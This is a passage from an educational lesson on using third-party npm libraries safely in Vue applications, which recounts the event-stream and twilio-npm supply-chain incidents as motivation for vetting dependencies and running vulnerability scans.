Third-Party Libraries
Explore best practices for using third-party libraries in Vue applications with a focus on security. Understand how to vet dependencies, lock versions to avoid breaking changes, and utilize vulnerability scanning tools like npm audit to protect your app from malicious code and maintain safe, reliable functionality.
We'll cover the following...
Can we use third-party libraries?
Nowadays, it’s very common to install a new dependency whenever specific functionality is needed. Do we need a fancy multiselect? Let’s check npm for packages. How about tooltip components?
Let’s head to npm. Third-party libraries are very useful because, instead of starting from scratch, we can just pick a library, plug it in, and have working functionality. There’s no need to write stuff from scratch or maintain it. Someone else does that job. Open-source is great, but it can occasionally backfire.
For instance, in 2018, malicious code was found in an npm package called event-stream. The infected version was downloaded around 8 million times within 2.5 months. The malicious code was designed to steal bitcoins and redirect any mined bitcoins to the attacker’s wallet. Another example is a malicious twilio-npm library discovered in 2020. The library opened a new TCP reverse shell on all computers where it was downloaded and then waited for new commands to run on the infected user’s computers. What can we do to protect ourselves from malicious code?